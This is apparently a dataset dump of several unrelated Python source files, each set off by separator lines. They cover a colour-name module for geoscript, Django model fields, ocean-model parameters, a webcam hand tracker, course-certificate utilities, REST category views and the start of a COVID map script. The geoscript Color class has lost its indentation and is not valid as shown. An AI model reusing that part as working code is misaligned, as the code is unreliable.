        # Pauses around terminate() -- presumably to let the distributed
        # backend settle; TODO confirm they are still needed.
        time.sleep(3)
        agent.terminate()
        time.sleep(3)
    @staticmethod
    def _calc_mean_return(records):
        # records[3] holds the sample batch; flatten rewards/terminals and
        # average the per-episode (terminal-delimited) returns.
        # NOTE(review): a batch containing no terminal yields np.mean([]) (nan).
        size = records[3]["rewards"].size
        rewards = records[3]["rewards"].reshape((size,))
        terminals = records[3]["terminals"].reshape((size,))
        returns = list()
        return_ = 0.0
        for r, t in zip(rewards, terminals):
            return_ += r
            if t:
                returns.append(return_)
                return_ = 0.0
        return np.mean(returns)
| StarcoderdataPython |
1660469 | <filename>geoscript/style/color.py
import string
from java import awt, lang
from geoscript.style.expression import Expression
from geoscript import util
_colors = {}
_colors['aliceblue'] = awt.Color(240,248,255)
_colors['antiquewhite'] = awt.Color(250,235,215)
_colors['aqua'] = awt.Color(0,255,255)
_colors['aquamarine'] = awt.Color(127,255,212)
_colors['azure'] = awt.Color(240,255,255)
_colors['beige'] = awt.Color(245,245,220)
_colors['bisque'] = awt.Color(255,228,196)
_colors['black'] = awt.Color(0,0,0)
_colors['blanchedalmond'] = awt.Color(255,235,205)
_colors['blue'] = awt.Color(0,0,255)
_colors['blueviolet'] = awt.Color(138,43,226)
_colors['brown'] = awt.Color(165,42,42)
_colors['burlywood'] = awt.Color(222,184,135)
_colors['cadetblue'] = awt.Color(95,158,160)
_colors['chartreuse'] = awt.Color(127,255,0)
_colors['chocolate'] = awt.Color(210,105,30)
_colors['coral'] = awt.Color(255,127,80)
_colors['cornflowerblue'] = awt.Color(100,149,237)
_colors['cornsilk'] = awt.Color(255,248,220)
_colors['crimson'] = awt.Color(220,20,60)
_colors['cyan'] = awt.Color(0,255,255)
_colors['darkblue'] = awt.Color(0,0,139)
_colors['darkcyan'] = awt.Color(0,139,139)
_colors['darkgoldenrod'] = awt.Color(184,134,11)
_colors['darkgray'] = awt.Color(169,169,169)
_colors['darkgreen'] = awt.Color(0,100,0)
_colors['darkkhaki'] = awt.Color(189,183,107)
_colors['darkmagenta'] = awt.Color(139,0,139)
_colors['darkolivegreen'] = awt.Color(85,107,47)
_colors['darkorange'] = awt.Color(255,140,0)
_colors['darkorchid'] = awt.Color(153,50,204)
_colors['darkred'] = awt.Color(139,0,0)
_colors['darksalmon'] = awt.Color(233,150,122)
_colors['darkseagreen'] = awt.Color(143,188,143)
_colors['darkslateblue'] = awt.Color(72,61,139)
_colors['darkslategray'] = awt.Color(47,79,79)
_colors['darkturquoise'] = awt.Color(0,206,209)
_colors['darkviolet'] = awt.Color(148,0,211)
_colors['deeppink'] = awt.Color(255,20,147)
_colors['deepskyblue'] = awt.Color(0,191,255)
_colors['dimgray'] = awt.Color(105,105,105)
_colors['dodgerblue'] = awt.Color(30,144,255)
_colors['firebrick'] = awt.Color(178,34,34)
_colors['floralwhite'] = awt.Color(255,250,240)
_colors['forestgreen'] = awt.Color(34,139,34)
_colors['fuchsia'] = awt.Color(255,0,255)
_colors['gainsboro'] = awt.Color(220,220,220)
_colors['ghostwhite'] = awt.Color(248,248,255)
_colors['gold'] = awt.Color(255,215,0)
_colors['goldenrod'] = awt.Color(218,165,32)
_colors['gray'] = awt.Color(128,128,128)
_colors['green'] = awt.Color(0,128,0)
_colors['greenyellow'] = awt.Color(173,255,47)
_colors['grey'] = awt.Color(84,84,84)
_colors['honeydew'] = awt.Color(240,255,240)
_colors['hotpink'] = awt.Color(255,105,180)
_colors['indianred'] = awt.Color(205,92,92)
_colors['indigo'] = awt.Color(75,0,130)
_colors['ivory'] = awt.Color(255,255,240)
_colors['khaki'] = awt.Color(240,230,140)
_colors['lavender'] = awt.Color(230,230,250)
_colors['lavenderblush'] = awt.Color(255,240,245)
_colors['lawngreen'] = awt.Color(124,252,0)
_colors['lemonchiffon'] = awt.Color(255,250,205)
_colors['lightblue'] = awt.Color(173,216,230)
_colors['lightcoral'] = awt.Color(240,128,128)
_colors['lightcyan'] = awt.Color(224,255,255)
_colors['lightgoldenrodyellow'] = awt.Color(250,250,210)
_colors['lightgrey'] = awt.Color(211,211,211)
_colors['lightgreen'] = awt.Color(144,238,144)
_colors['lightpink'] = awt.Color(255,182,193)
_colors['lightsalmon'] = awt.Color(255,160,122)
_colors['lightseagreen'] = awt.Color(32,178,170)
_colors['lightskyblue'] = awt.Color(135,206,250)
_colors['lightslategray'] = awt.Color(119,136,153)
_colors['lightsteelblue'] = awt.Color(176,196,222)
_colors['lightyellow'] = awt.Color(255,255,224)
_colors['lime'] = awt.Color(0,255,0)
_colors['limegreen'] = awt.Color(50,205,50)
_colors['linen'] = awt.Color(250,240,230)
_colors['magenta'] = awt.Color(255,0,255)
_colors['maroon'] = awt.Color(128,0,0)
_colors['mediumaquamarine'] = awt.Color(102,205,170)
_colors['mediumblue'] = awt.Color(0,0,205)
_colors['mediumorchid'] = awt.Color(186,85,211)
_colors['mediumpurple'] = awt.Color(147,112,216)
_colors['mediumseagreen'] = awt.Color(60,179,113)
_colors['mediumslateblue'] = awt.Color(123,104,238)
_colors['mediumspringgreen'] = awt.Color(0,250,154)
_colors['mediumturquoise'] = awt.Color(72,209,204)
_colors['mediumvioletred'] = awt.Color(199,21,133)
_colors['midnightblue'] = awt.Color(25,25,112)
_colors['mintcream'] = awt.Color(245,255,250)
_colors['mistyrose'] = awt.Color(255,228,225)
_colors['moccasin'] = awt.Color(255,228,181)
_colors['navajowhite'] = awt.Color(255,222,173)
_colors['navy'] = awt.Color(0,0,128)
_colors['oldlace'] = awt.Color(253,245,230)
_colors['olive'] = awt.Color(128,128,0)
_colors['olivedrab'] = awt.Color(107,142,35)
_colors['orange'] = awt.Color(255,165,0)
_colors['orangered'] = awt.Color(255,69,0)
_colors['orchid'] = awt.Color(218,112,214)
_colors['palegoldenrod'] = awt.Color(238,232,170)
_colors['palegreen'] = awt.Color(152,251,152)
_colors['paleturquoise'] = awt.Color(175,238,238)
_colors['palevioletred'] = awt.Color(216,112,147)
_colors['papayawhip'] = awt.Color(255,239,213)
_colors['peachpuff'] = awt.Color(255,218,185)
_colors['peru'] = awt.Color(205,133,63)
_colors['pink'] = awt.Color(255,192,203)
_colors['plum'] = awt.Color(221,160,221)
_colors['powderblue'] = awt.Color(176,224,230)
_colors['purple'] = awt.Color(128,0,128)
_colors['red'] = awt.Color(255,0,0)
_colors['rosybrown'] = awt.Color(188,143,143)
_colors['royalblue'] = awt.Color(65,105,225)
_colors['saddlebrown'] = awt.Color(139,69,19)
_colors['salmon'] = awt.Color(250,128,114)
_colors['sandybrown'] = awt.Color(244,164,96)
_colors['seagreen'] = awt.Color(46,139,87)
_colors['seashell'] = awt.Color(255,245,238)
_colors['sienna'] = awt.Color(160,82,45)
_colors['silver'] = awt.Color(192,192,192)
_colors['skyblue'] = awt.Color(135,206,235)
_colors['slateblue'] = awt.Color(106,90,205)
_colors['slategray'] = awt.Color(112,128,144)
_colors['snow'] = awt.Color(255,250,250)
_colors['springgreen'] = awt.Color(0,255,127)
_colors['steelblue'] = awt.Color(70,130,180)
_colors['tan'] = awt.Color(210,180,140)
_colors['teal'] = awt.Color(0,128,128)
_colors['thistle'] = awt.Color(216,191,216)
_colors['tomato'] = awt.Color(255,99,71)
_colors['turquoise'] = awt.Color(64,224,208)
_colors['violet'] = awt.Color(238,130,238)
_colors['wheat'] = awt.Color(245,222,179)
_colors['white'] = awt.Color(255,255,255)
_colors['whitesmoke'] = awt.Color(245,245,245)
_colors['yellow'] = awt.Color(255,255,0)
_colors['yellowgreen'] = awt.Color(154,205,50)
class Color(Expression):
"""
Expression that evaluates to a color object.
The `val` argument may be specified as an rgba tuple:
>>> Color((255, 0, 255))
(255,0,255)
Or as a hex color string:
>>> Color('ff00ff')
(255,0,255)
Or as a well known color name:
>>> Color('magenta')
(255,0,255)
"""
def __init__(self, val):
Expression.__init__(self, val)
def _expr(self, val):
if isinstance(val, Expression):
# direct expression specified
return val.expr
else:
# transform val to color
if isinstance(val, awt.Color):
# try direct awt color
col = val
elif _colors.has_key(val):
# try well known
col = _colors[val]
elif isinstance(val,(list,tuple)):
# try as tuple
col = awt.Color(*val)
elif isinstance(val, (str,unicode)):
# look up wellknown
if hasattr(awt.Color, string.upper(val)):
col = getattr(awt.Color, string.upper(val))
else:
# try as hex string
val = val[1:] if val[0] == "#" else val
# convert 3 digit to 6
if len(val) == 3:
val = ''.join([val[i]+val[i] for i in range(0,3)])
# support 8 and 6 digit
if len(val) == 8:
# move alpha to end
val = val[2:] + val[:2]
col = awt.Color(*[int('0x'+x,0)
for x in [val[i:i+2] for i in range(0, len(val), 2)]])
#for x in val[0:2],val[2:4],val[4:6]])
else:
# default
col = awt.Color(0,0,0)
return self.factory.filter.literal(col)
def __repr__(self):
return "(%d,%d,%d)" % self.rgb
def _getcolor(self):
return self.expr.evaluate(awt.Color)
_color = property(_getcolor)
def getrgb(self):
col = self._color
return (col.red, col.green, col.blue)
rgb = property(getrgb,None,None,"The RGB value of the color")
def getrgba(self):
col = self._color
return (col.red, col.green, col.blue, col.alpha)
rgba = property(getrgba,None,None,"The RGBA value of the color")
def getargb(self):
col = self._color
return (col.alpha, col.red, col.green, col.blue)
argb = property(getrgba,None,None,"The ARGB value of the color")
def gethex(self):
return self._tohex(self.rgb)
hex = property(gethex,None,None,"The hex value of the color")
def getahex(self):
return self._hex(self.argb)
ahex = property(gethex,None,None,"The hex value, with alpha, of the color")
def _tohex(self, vals):
return ''.join([lang.String.format('%02x', x) for x in vals])
def gethsl(self):
r,g,b = [x/255.0 for x in self.rgb]
lo, hi = min(r,g,b), max(r,g,b)
h = s = l = (lo+hi)/2.0
if lo == hi:
h = s = 0 # achromatic
else:
d = float(hi - lo);
s = d / (2-hi-lo) if l > 0.5 else d / (hi+lo)
h = {
r: lambda x: (g - b) / d + (6 if g < b else 0),
g: lambda x: (b - r) / d + 2,
b: lambda x: (r - g) / d + 4
}[hi](-1)
h /= 6.0;
return [x for x in [h, s, l]];
hsl = property(gethsl,None,None,"The HSL/HLS value of the color")
def opacity(self, o):
return self.alpha(int(255*o))
def alpha(self, a):
return Color(tuple(list(self.rgb) + [a]))
def interpolate(self, color, n=10, method='linear'):
"""
Interpolates a set of color values beteen this color and the specified
*color*.
The *n* parameter specifies how many values to interpolate, specifically the
number of classes resulting from the interpolation. The interpolation is
inclusive of this and the specified color and returns a list of *n*+1
values.
"""
color = Color(color)
hsl1,hsl2 = self.hsl, color.hsl
dhsl = map(lambda x: x[1]-x[0], zip(hsl1,hsl2))
colors = [Color.fromHSL(map(lambda x,y: x + (r/float(n))*y,hsl1,dhsl))
for r in util.interpolate(0, n, n, method)]
if self._color.alpha != color._color.alpha:
alphas = util.interpolate(self._color.alpha,color._color.alpha,n,method)
colors = map(lambda (c,a): c.alpha(int(a)), zip(colors, alphas))
return colors
@classmethod
def fromHSL(cls, hsl):
"""
Creates a color object from the HSL/HLS value.
"""
h,s,l = hsl
if s == 0:
r = g = b = l # achromatic
else:
q = l * (1+s) if l < 0.5 else l + s - l * s;
p = 2 * l - q
#var q = l < 0.5 ? l * (1 + s) : l + s - l * s;
#var p = 2 * l - q;
r = Color._hue2rgb(p, q, h + 1/3.0)
g = Color._hue2rgb(p, q, h);
b = Color._hue2rgb(p, q, h - 1/3.0);
return Color(tuple([int(round(255*x)) for x in [r,g,b]]))
@classmethod
def random(cls, n):
"""
Returns a generator of random colors.
*n* is the number of colors to generate.
"""
colors = _colors.values()
from random import randint
for i in range(n):
yield Color(colors[randint(0,len(colors)-1)])
@classmethod
def _hue2rgb(cls, p, q, t):
if t < 0:
t += 1;
if t > 1:
t -= 1;
if t < 1/6.0:
return p + (q - p) * 6 * t;
if t < 1/2.0:
return q;
if t < 2/3.0:
return p + (q - p) * (2/3.0 - t) * 6;
return p;
| StarcoderdataPython |
1648189 | <gh_stars>1-10
from django.db import models
from django.utils.translation import gettext_lazy as _
from .types import OTHER_VALUE, Detector, Filter, Method
class MethodBooleanField(models.BooleanField):
    """Boolean model field flagging whether an analysis *method* applies."""
    method: Method
    def __init__(self, method: Method):
        self.method = method
        # Label, help text and default are derived from the method, so model
        # declarations only need to pass the method itself.
        super().__init__(
            verbose_name=method,
            help_text=_("{} analysis technique").format(method),
            default=False,
        )
    def deconstruct(self):
        # Drop the derived kwargs and re-insert `method` as a positional
        # argument so migrations can rebuild the field from it alone.
        name, path, args, kwargs = super().deconstruct()
        del kwargs["verbose_name"]
        del kwargs["help_text"]
        del kwargs["default"]
        args = [self.method, *args]
        return name, path, args, kwargs
class DetectorFieldMixin:
    """Mixin deriving verbose_name/help_text from a (method, detector) pair.

    Meant to be combined with a concrete Django field class; remaining
    args/kwargs are forwarded to that field's __init__.
    """
    method: Method
    detector: Detector
    def __init__(
        self: models.Field, method: Method, detector: Detector, *args, **kwargs
    ):
        self.method = method
        self.detector = detector
        super().__init__(  # type: ignore
            # The OTHER_VALUE sentinel gets a generic translated label.
            verbose_name=_("other detector") if detector == OTHER_VALUE else detector,
            help_text=_("{} / {} detector").format(
                method,
                detector,
            ),
            *args,
            **kwargs
        )
    def deconstruct(self):
        # Re-insert method/detector as positional args for migrations.
        name, path, args, kwargs = super().deconstruct()
        del kwargs["verbose_name"]
        del kwargs["help_text"]
        args = [self.method, self.detector, *args]
        return name, path, args, kwargs
class DetectorBooleanField(DetectorFieldMixin, models.BooleanField):
    """Boolean detector flag; always defaults to False."""
    def __init__(self, *args, **kwargs):
        # NOTE(review): **kwargs is accepted but silently discarded here --
        # confirm callers never pass extra field options.
        super().__init__(*args, default=False)
    def deconstruct(self):
        # `default` is fixed in __init__, so migrations must not repeat it.
        name, path, args, kwargs = super().deconstruct()
        del kwargs["default"]
        return name, path, args, kwargs
class DetectorCharField(DetectorFieldMixin, models.CharField):
    """Free-text detector field (45 chars, optional, empty default)."""
    def __init__(self, *args, **kwargs):
        # NOTE(review): **kwargs is accepted but silently discarded here --
        # confirm callers never pass extra field options.
        super().__init__(*args, max_length=45, default="", blank=True)
    def deconstruct(self):
        # These kwargs are fixed in __init__, so migrations must not repeat them.
        name, path, args, kwargs = super().deconstruct()
        del kwargs["max_length"]
        del kwargs["default"]
        del kwargs["blank"]
        return name, path, args, kwargs
class FiltersCharField(models.CharField):
    """CharField without explicit choices

    Choice management is done by the Form.
    """

    method: Method
    detector: Detector
    filters: list[Filter]

    def __init__(
        self, method: Method, detector: Detector, filters: list[Filter], *args, **kwargs
    ):
        if not filters:
            # ValueError is more precise than a bare Exception and remains
            # backward compatible with any ``except Exception`` handlers.
            raise ValueError("FilterCharField requires some filters")
        self.method = method
        self.detector = detector
        self.filters = filters
        # NOTE(review): *args/**kwargs are accepted but not forwarded to
        # super().__init__() -- confirm this is intentional before changing.
        super().__init__(  # type: ignore
            verbose_name=_("{} filters").format(detector),
            help_text=_("{} / {} filters choice").format(method, detector),
            max_length=45,
            default="",
            blank=True,
        )

    def deconstruct(self):
        """Expose method/detector/filters positionally; drop derived kwargs."""
        name, path, args, kwargs = super().deconstruct()
        args = [self.method, self.detector, self.filters, *args]
        for derived in ("verbose_name", "help_text", "max_length", "default", "blank"):
            del kwargs[derived]
        return name, path, args, kwargs
| StarcoderdataPython |
1618637 | <reponame>MalikJordan/pyPOM1D
# params_pombfm -- run-time parameters for the 1-D POM-BFM model
h = 150.0 # Depth [m]
# dti = 100.0 # timestep [s]
dti = 3600. # timestep [s]
alat = 45.0 # latitude [degrees]
idiagn = 1 # switch between prognostic (idiagn = 0) and diagnostic (idiagn = 1) mode
idays = 3600 # length of run [days]
# idays = 366
smoth = 0.1 # parameter for the Robert-Asselin time filter
ihotst = 0 # switch for cold start (ihotst = 0) and hot start, ie reading restart (ihotst = 1)
kl1 = 2 # surface logarithmic layers distribution
kl2 = 150 # bottom logarithmic layers distribution
savef = 1 # output averaging and saving frequency [days]
nrt_o2o = 0.06 # relaxation velocity for oxygen [m/d]
nrt_n1p = 0.06 # relaxation velocity for phosphate [m/d]
nrt_n3n = 0.06 # relaxation velocity for nitrate [m/d]
nrt_n4n = 0.05 # relaxation velocity for ammonium [m/d]
nbct = 2 # flag for temperature boundary conditions
nbcs = 1 # flag for salinity boundary conditions
nbcbfm = 1 # flag for bfm boundary conditions
umol = 1e-06 # background diffusion
umolt = 1e-07 # background diffusion for temperature
umols = 1.3e-07 # background diffusion for salinity
umolbfm = 0.0001 # background diffusion for bfm
ntp = 2 # flag for jerlov water type ( 1 = I, 2 = IA, 3 = IB, 4 = II, 5 = III)
trt = 0 # relaxation time for lateral temperature advection
srt = 1 # relaxation time for lateral salinity advection
upperh = 5.0 # depth where lateral advection starts [m]
ssrt = 5.68 # relaxation time for surface salinity flux
1793710 | <gh_stars>0
import cv2
import mediapipe as mp

# time is used to measure the frame rate.
import time

# VideoCapture object for the default camera (device 0).
cap = cv2.VideoCapture(0)

# MediaPipe hand solution: detects hands and yields 21 landmarks per hand.
mpHands = mp.solutions.hands
# Default parameters: static_image_mode=False means detection + tracking
# (tracking is used while its confidence stays above the threshold).
hands = mpHands.Hands()
mpDraw = mp.solutions.drawing_utils

# Timestamps used to compute frames-per-second.
ptime = 0
ctime = 0

if not cap.isOpened():
    print("Camera is not started yet")

while True:
    # Read one frame; ``success`` is False when no frame could be grabbed.
    success, img = cap.read()
    # Bug fix: bail out *before* touching ``img``.  The original checked
    # ``success`` only after processing, so a failed read handed an invalid
    # frame to cv2 and crashed before the check was ever reached.
    if not success:
        break

    # MediaPipe expects RGB input while OpenCV delivers BGR.
    imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    # Run hand landmark estimation on the frame.
    results = hands.process(imgRGB)

    if results.multi_hand_landmarks:
        for handlms in results.multi_hand_landmarks:
            # Each hand has 21 landmarks (ids 0-20) with normalised x/y.
            for id, lm in enumerate(handlms.landmark):
                h, w, c = img.shape
                # Convert normalised landmark coordinates to pixels.
                cx, cy = int(lm.x * w), int(lm.y * h)
                # Highlight the index fingertip (id 8)...
                if id == 8:
                    cv2.circle(img, (cx, cy), 20, (255, 0, 255), cv2.FILLED)
                # ...and the middle fingertip (id 12).
                if id == 12:
                    cv2.circle(img, (cx, cy), 20, (255, 255, 0), cv2.FILLED)
            # Draw the landmarks and the connections between them.
            mpDraw.draw_landmarks(img, handlms, mpHands.HAND_CONNECTIONS)

    # Compute and overlay the frame rate.
    ctime = time.time()
    fps = 1 / (ctime - ptime)
    ptime = ctime
    cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 3)

    cv2.imshow("Hand Detector WebCam", img)

    # Quit when the user presses "q".
    if cv2.waitKey(1) & 0xFF == ord("q"):
        break

# When everything is done, release the capture and close the windows.
cap.release()
cv2.destroyAllWindows()
1754819 | """
Utilities for courses/certificates
"""
import logging
from requests.exceptions import HTTPError
from rest_framework.status import HTTP_404_NOT_FOUND
from django.conf import settings
from django.db import transaction
from courses.constants import PROGRAM_TEXT_ID_PREFIX
from courses.models import (
CourseRunGrade,
CourseRunCertificate,
ProgramCertificate,
Program,
CourseRun,
ProgramEnrollment,
)
from mitxpro.utils import has_equal_properties
from courseware.api import get_edx_api_course_detail_client
log = logging.getLogger(__name__)
def ensure_course_run_grade(user, course_run, edx_grade, should_update=False):
    """
    Ensure that the local grades repository has the grade for the User/CourseRun combination supplied.

    Args:
        user (user.models.User): The user for whom the grade is being synced
        course_run (courses.models.CourseRun): The course run for which the grade is created
        edx_grade (edx_api.grades.models.UserCurrentGrade): The OpenEdx grade object
        should_update (bool): Update the local grade record if it exists

    Returns:
        (courses.models.CourseRunGrade, bool, bool) that depicts the CourseRunGrade, created and updated values
    """
    grade_properties = {
        "grade": edx_grade.percent,
        "passed": edx_grade.passed,
        "letter_grade": edx_grade.letter_grade,
    }
    updated = False
    if should_update:
        with transaction.atomic():
            # Row lock (select_for_update) prevents concurrent syncs from
            # clobbering each other's writes.
            run_grade, created = CourseRunGrade.objects.select_for_update().get_or_create(
                course_run=course_run, user=user, defaults=grade_properties
            )
            # Only overwrite an existing record when it was not set by an
            # admin and the synced values actually differ.
            if (
                not created
                and not run_grade.set_by_admin
                and not has_equal_properties(run_grade, grade_properties)
            ):
                # Perform actual update now.
                run_grade.grade = edx_grade.percent
                run_grade.passed = edx_grade.passed
                run_grade.letter_grade = edx_grade.letter_grade
                run_grade.save_and_log(None)
                updated = True
    else:
        run_grade, created = CourseRunGrade.objects.get_or_create(
            course_run=course_run, user=user, defaults=grade_properties
        )
    return run_grade, created, updated
def process_course_run_grade_certificate(course_run_grade):
    """
    Ensure that the course run certificate is in line with the course run grade.

    Args:
        course_run_grade (courses.models.CourseRunGrade): The course run grade
            driving certificate creation/deletion

    Returns:
        (courses.models.CourseRunCertificate, bool, bool): the certificate (or
        None), whether it was created, and whether one was deleted
    """
    user = course_run_grade.user
    course_run = course_run_grade.course_run

    if not course_run_grade.grade:
        # A grade of 0.0 indicates that any existing certificate must go.
        delete_count, _ = CourseRunCertificate.objects.filter(
            user=user, course_run=course_run
        ).delete()
        return None, False, delete_count > 0

    if course_run_grade.passed:
        certificate, created = CourseRunCertificate.objects.get_or_create(
            user=user, course_run=course_run
        )
        return certificate, created, False

    return None, False, False
def generate_program_certificate(user, program):
    """
    Create a program certificate if the user has a course certificate
    for each course in the program. Also, It will create the
    program enrollment if it does not exist for the user.

    Args:
        user (User): a Django user.
        program (programs.models.Program): program where the user is enrolled.

    Returns:
        (ProgramCertificate or None, bool): A tuple containing a
        ProgramCertificate (or None if one was not found or created) paired
        with a boolean indicating whether the certificate was newly created.
    """
    # Short-circuit: a certificate already exists -- just make sure the
    # enrollment record exists too, and report "not newly created".
    existing_cert_queryset = ProgramCertificate.objects.filter(
        user=user, program=program
    )
    if existing_cert_queryset.exists():
        ProgramEnrollment.objects.get_or_create(
            program=program, user=user, defaults={"active": True, "change_status": None}
        )
        return existing_cert_queryset.first(), False
    # Count distinct courses (not runs) for which the user holds a
    # certificate; a program certificate requires one for every course.
    courses_in_program_ids = set(program.courses.values_list("id", flat=True))
    num_courses_with_cert = (
        CourseRunCertificate.objects.filter(
            user=user, course_run__course_id__in=courses_in_program_ids
        )
        .distinct()
        .count()
    )
    if len(courses_in_program_ids) > num_courses_with_cert:
        return None, False
    program_cert = ProgramCertificate.objects.create(user=user, program=program)
    if program_cert:
        log.info(
            "Program certificate for [%s] in program [%s] is created.",
            user.username,
            program.title,
        )
        _, created = ProgramEnrollment.objects.get_or_create(
            program=program, user=user, defaults={"active": True, "change_status": None}
        )
        if created:
            log.info(
                "Program enrollment for [%s] in program [%s] is created.",
                user.username,
                program.title,
            )
    return program_cert, True
def revoke_program_certificate(
    user, readable_id, revoke_state, include_program_courses
):
    """
    Set the revocation state of a user's program certificate.

    Args:
        user (User): a Django user.
        readable_id: the program (readable_id) whose certificate is updated.
        revoke_state (bool): new value for ``is_revoked``.
        include_program_courses (bool): also apply the state to every course
            run certificate belonging to the program.

    Returns:
        bool: True when a certificate was updated, False when none exists.
    """
    program = Program.objects.get(readable_id=readable_id)
    try:
        certificate = ProgramCertificate.all_objects.get(
            user=user, program__readable_id=readable_id
        )
    except ProgramCertificate.DoesNotExist:
        log.warning(
            "Program certificate for user: %s in program %s does not exist.",
            user.username,
            readable_id,
        )
        return False

    certificate.is_revoked = revoke_state
    certificate.save()

    if include_program_courses:
        # Cascade the state to all course run certificates of the program.
        course_ids = set(program.courses.values_list("id", flat=True))
        CourseRunCertificate.all_objects.filter(
            user=user, course_run__course_id__in=course_ids
        ).update(is_revoked=revoke_state)
        log.info(
            "Course certificates associated with that program: [%s] are also updated",
            program,
        )
    return True
def revoke_course_run_certificate(user, courseware_id, revoke_state):
    """
    Set the revocation state of a user's course run certificate.

    Args:
        user (User): a Django user.
        courseware_id: identifies the course run.
        revoke_state (bool): new value for ``is_revoked``.

    Returns:
        bool: True when a certificate was updated, False when none exists.
    """
    course_run = CourseRun.objects.get(courseware_id=courseware_id)
    try:
        certificate = CourseRunCertificate.all_objects.get(
            user=user, course_run=course_run
        )
    except CourseRunCertificate.DoesNotExist:
        log.warning(
            "Course run certificate for user: %s and course_run: %s does not exist.",
            user.username,
            course_run,
        )
        return False

    certificate.is_revoked = revoke_state
    certificate.save()
    return True
def sync_course_runs(runs):
    """
    Sync course run dates and title from Open edX

    Args:
        runs ([CourseRun]): list of CourseRun objects.

    Returns:
        (int, int): number of runs synced successfully and number of
        failures (note: not lists of log strings -- only counts are
        returned)
    """
    api_client = get_edx_api_course_detail_client()
    success_count = 0
    failure_count = 0
    # Iterate all eligible runs and sync if possible
    for run in runs:
        try:
            course_detail = api_client.get_detail(
                course_id=run.courseware_id,
                username=settings.OPENEDX_SERVICE_WORKER_USERNAME,
            )
        except HTTPError as e:
            failure_count += 1
            if e.response.status_code == HTTP_404_NOT_FOUND:
                log.error(
                    "Course not found on edX for readable id: %s", run.courseware_id
                )
            else:
                log.error("%s: %s", str(e), run.courseware_id)
        except Exception as e:  # pylint: disable=broad-except
            failure_count += 1
            log.error("%s: %s", str(e), run.courseware_id)
        else:
            # Reset the expiration_date so it is calculated automatically and
            # does not raise a validation error now that the start or end date
            # has changed.
            if (
                run.start_date != course_detail.start
                or run.end_date != course_detail.end
            ):
                run.expiration_date = None
            run.title = course_detail.name
            run.start_date = course_detail.start
            run.end_date = course_detail.end
            run.enrollment_start = course_detail.enrollment_start
            run.enrollment_end = course_detail.enrollment_end
            try:
                run.save()
                success_count += 1
                log.info("Updated course run: %s", run.courseware_id)
            except Exception as e:  # pylint: disable=broad-except
                # Report any validation or otherwise model errors
                log.error("%s: %s", str(e), run.courseware_id)
                failure_count += 1
    return success_count, failure_count
def is_program_text_id(item_text_id):
    """
    Determine whether a text id for an enrollable item refers to a program.

    Args:
        item_text_id (str): The text id for some enrollable item (program/course run)

    Returns:
        bool: True if the given id carries the program prefix
    """
    prefix = PROGRAM_TEXT_ID_PREFIX
    return item_text_id[: len(prefix)] == prefix
| StarcoderdataPython |
3320752 | from rest_framework import generics, permissions, authentication
from . import serializers
from . import models
from core.permissions import IsAdmin
class GetAllCategoriesView(generics.ListAPIView):
    """List all main categories ordered by id."""
    serializer_class = serializers.MainCategoryListSerializer
    queryset = models.MainCategory.objects.all().order_by('id')
class CreateMainCategoryView(generics.CreateAPIView):
    """Create a main category; admin-only, token-authenticated."""
    permission_classes = (permissions.IsAdminUser,)
    authentication_classes = (authentication.TokenAuthentication,)
    serializer_class = serializers.MainCategorySerializer
class MainCategoryListView(generics.ListAPIView):
    """List all main categories with the full serializer."""
    queryset = models.MainCategory.objects.all()
    serializer_class = serializers.MainCategorySerializer
class ManageMainCategoryView(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve/update/delete a main category; admin-only, token-authenticated."""
    queryset = models.MainCategory.objects.all()
    authentication_classes = (authentication.TokenAuthentication,)
    permission_classes = (permissions.IsAdminUser,)
    serializer_class = serializers.MainCategorySerializer
class CreateCategoryView(generics.CreateAPIView):
    """Create a category; guarded by the project's custom IsAdmin permission."""
    serializer_class = serializers.CategorySerializer
    permission_classes = (IsAdmin,)
    authentication_classes = (authentication.TokenAuthentication,)
class CategoryListView(generics.ListAPIView):
    """List all categories with nested serialization.

    NOTE(review): uses DRF's IsAdminUser while the create/manage category
    views use the custom IsAdmin permission -- confirm this is intended.
    """
    queryset = models.Category.objects.all()
    permission_classes = (permissions.IsAdminUser,)
    authentication_classes = (authentication.TokenAuthentication,)
    serializer_class = serializers.CategoryNestedSerializer
class MangeCategoryView(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve/update/delete a category (custom IsAdmin permission).

    NOTE(review): class name looks like a typo for "ManageCategoryView";
    renaming would break URL conf imports, so it is only flagged here.
    """
    queryset = models.Category.objects.all()
    serializer_class = serializers.CategorySerializer
    permission_classes = (IsAdmin,)
    authentication_classes = (authentication.TokenAuthentication,)
class CreateSubCategoryView(generics.CreateAPIView):
    """Create a sub-category; guarded by the custom IsAdmin permission."""
    serializer_class = serializers.SubCategorySerializer
    permission_classes = (IsAdmin,)
    authentication_classes = (authentication.TokenAuthentication,)
class SubCategoryListView(generics.ListAPIView):
    """List all sub-categories (read serializer); admin-only, token-authenticated."""
    queryset = models.SubCategory.objects.all()
    serializer_class = serializers.SubCategoryReadSerializer
    authentication_classes = (authentication.TokenAuthentication,)
    permission_classes = (permissions.IsAdminUser,)
class MangeSubCategoryView(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve/update/delete a sub-category (custom IsAdmin permission).

    NOTE(review): class name looks like a typo for "ManageSubCategoryView".
    """
    queryset = models.SubCategory.objects.all()
    serializer_class = serializers.SubCategorySerializer
    permission_classes = (IsAdmin,)
    authentication_classes = (authentication.TokenAuthentication,)
| StarcoderdataPython |
3343392 | #!/usr/bin/python3
# coding: utf-8
# This source code is based on japanmap: https://github.com/SaitoTsutomu/japanmap
import codecs
from cv2 import imread, cvtColor, COLOR_BGR2RGB
import json
#import matplotlib.pyplot as plt
#import matplotlib.dates as dates
#import matplotlib.cm as cm
import numpy as np
import pandas as pd
import plotly
import plotly.express as px
import plotly.tools as tls
import plotly.graph_objects as go
import plotly.io as pio
import plotly.offline as offline
from plotly.subplots import make_subplots
import sys
if "ipy" in sys.argv[0]:
offline.init_notebook_mode()
from svglib.svglib import svg2rlg
from reportlab.graphics import renderPM
from pathlib import Path
from cov19utils import show_and_save_plotly
FONT_NAME = 'MS Gothic'
# Subprefecture (bureau) lookup table.
sub_prefs = {
    # Population totals from the Basic Resident Register, 2020-07-31.
    0: dict(name="非公表"  , code="00", suffix="その他", total=9999999),
    1: dict(name="石狩"   , code="01", suffix="振興局"  , total=2385306),
    2: dict(name="渡島"   , code="02", suffix="総合振興局", total= 385954),
